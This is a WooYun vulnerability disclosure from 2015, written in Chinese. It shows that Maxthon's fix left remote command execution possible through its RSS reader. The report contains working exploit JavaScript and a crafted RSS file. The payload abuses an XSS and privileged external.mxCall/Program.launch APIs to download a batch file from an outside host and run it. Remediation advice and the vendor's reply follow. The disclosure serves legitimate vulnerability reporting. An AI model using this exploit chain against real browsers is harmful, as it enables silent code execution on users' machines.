当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097165

漏洞标题:傲游浏览器修复不当导致依然可远程命令执行

相关厂商:傲游

漏洞作者: 路人甲

提交时间:2015-02-13 18:56

修复时间:2015-05-16 12:58

公开时间:2015-05-16 12:58

漏洞类型:远程代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-13: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向核心白帽子及相关领域专家公开
2015-04-21: 细节向普通白帽子公开
2015-05-01: 细节向实习白帽子公开
2015-05-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

远看像修了,近看还没修,
也许是修了,只是没修好。
希望傲游新年来能在大家的共同努力下把安全做的越来越好。

详细说明:

1. 距离 这个 WooYun: 傲游浏览器远程命令执行漏洞二 漏洞,傲游已经更新了好几个版本。目前该漏洞已经被公开了。但是对于这个报告中所报告的问题,小问题确实是修了,但是最为关键的“核心”点,却依然没有得到修复。
A. 修复了报告中的“非关键点”,一个傲游域下的XSS。即:http://sso.maxthon.cn/quit.php这个页面被删除。
B. 禁用了 external.mxCall('InstallSkin', "http://xsst.sinaapp.com/test/mx.bat"), 这样使得我们无法向临时目录写入mx.bat
2. 然后上面这些点并非最致命的点, rss reader里可以导致执行命令的XSS却根本没有被修。
原漏洞中的 http://xsst.sinaapp.com/test/mxpoc.xml 直接打开,依然可以打开计算器。

1.jpg


傲游对rss reader里的富文本过滤正则没有做任何的改动。
3. 虽然傲游修复了 原漏洞的 XSS 和 external.mxCall('InstallSkin', ..); 但这两个点实际上并不是最关键的。所以我们很容易再次执行任意命令。
------------------------------------------------------------
4. 其实这个漏洞,连傲游域下的XSS都不需要。
在 mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?http://xsst.sinaapp.com/test/mxpoc.xml 这个域下,我们只需要嵌入一个iframe,iframe的src为 http://www.maxthon.cn/,然后通过 iframe.contentWindow.external 即可有权限调用 mxCall函数。
而external.mxCall('InstallSkin', ..); 虽然被禁止了,但是

external.mxCall("InstallApp", "http://xsst.sinaapp.com/test/mx.bat");


依然还是可以使用的。。。,治标不治本。
5. 所以我们很容易重新写出下面的利用代码。

var x=document.createElement("iframe");
x.src="http://www.maxthon.cn";
x.onload=function(){
x.contentWindow.external.mxCall("InstallApp", "http://xsst.sinaapp.com/test/mx.bat");
setTimeout(function(){
var s=document.createElement("iframe");s.src="mx://res/notification/";s.onload=function(){s.contentWindow.maxthon.program.Program.launch(s.contentWindow.maxthon.system.Environment.getFolderPath("Mx3data")+"Temp/mx.bat","")};document.body.appendChild(s);
},1500);
};
document.body.appendChild(x);


6. 接着同原漏洞一样,利用 rss reader 的XSS即可。

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>wooyun.org 最新提交漏洞</title>
<link>http://www.wooyun.org</link>
<ttl>5</ttl>
<description>wooyun.org</description>
<language>zh-cn</language>
<generator>www.wooyun.org</generator>
<webmaster>webmaster@wooyun.org</webmaster>
<item>
<link> WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 </link>
<title><![CDATA[苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞]]></title>
<description><![CDATA[<strong><iframe name='var%20x%3Ddocument.createElement%28%22iframe%22%29%3B%0Ax.src%3D%22http%3A//www.maxthon.cn%22%3B%0Ax.onload%3Dfunction%28%29%7B%0A%09x.contentWindow.external.mxCall%28%22InstallApp%22%2C%20%22http%3A//xsst.sinaapp.com/test/mx.bat%22%29%3B%0A%09setTimeout%28function%28%29%7B%0A%09%09var%20s%3Ddocument.createElement%28%22iframe%22%29%3Bs.src%3D%22mx%3A//res/notification/%22%3Bs.onload%3Dfunction%28%29%7Bs.contentWindow.maxthon.program.Program.launch%28s.contentWindow.maxthon.system.Environment.getFolderPath%28%22Mx3data%22%29+%22Temp/mx.bat%22%2C%22%22%29%7D%3Bdocument.body.appendChild%28s%29%3B%0A%09%7D%2C1500%29%3B%0A%7D%3B%0Adocument.body.appendChild%28x%29%3B%0A' src="javascript:eval(unescape(window.name));void 0; "/>简要描述:</strong><br/>苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞<br/><strong>详细说明:</strong><br/>暂未公开<br/><br/><strong><a href=" WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 " target="_blank">更多内容 &gt;&gt;</a></strong>]]></description>
<pubDate>Wed, 05 Nov 2014 15:38:18 +0800</pubDate>
<category></category>
<author>路人甲</author>
<guid> WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 </guid>
</item>
</channel>
</rss>

漏洞证明:

傲游最新版本: Version: 4.4.4.2000

3.png


打开 http://appmaker.sinaapp.com/poc/cn.maxthon/mxpoc_new.xml
可以看到我们的批处理被下载并执行。

2.jpg

修复方案:

1. 可以看到,这次利用里都不需要maxthon.cn的XSS了,所以光修傲游域下的XSS是没用的。
2. 与其禁用external.mxCall('InstallSkin', ..); 还不如,对 external.mxCall('InstallSkin', ..);中皮肤或者插件的路径进行严格的URL判断。不仅安全得多,也容易得多。
3. 一定要修复rss reader这个XSS才行啊。
4. 修复要修要害,不要修无关痛痒的位置啊。
5. 希望傲游新年来能在大家的共同努力下把安全做的越来越好。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-15 12:57

厂商回复:

感谢反馈. RSS 中的漏洞下版处理

最新状态:

2015-04-02:4.4.4.3000 修复


漏洞评价:

评论

  1. 2015-02-13 18:58 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    相关技师决定新年不放假

  2. 2015-02-13 19:25 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    路人甲 诗王附体

  3. 2015-02-13 20:53 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    又是二哥·llllllllll

  4. 2015-02-13 21:14 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    二哥你够了

  5. 2015-02-14 09:38 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @gainover 二哥下次写路人甲的时候把 “不当导致依然可远程命令执行” 把依然去掉。。。。

  6. 2015-02-15 13:14 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明,什么也没有留下)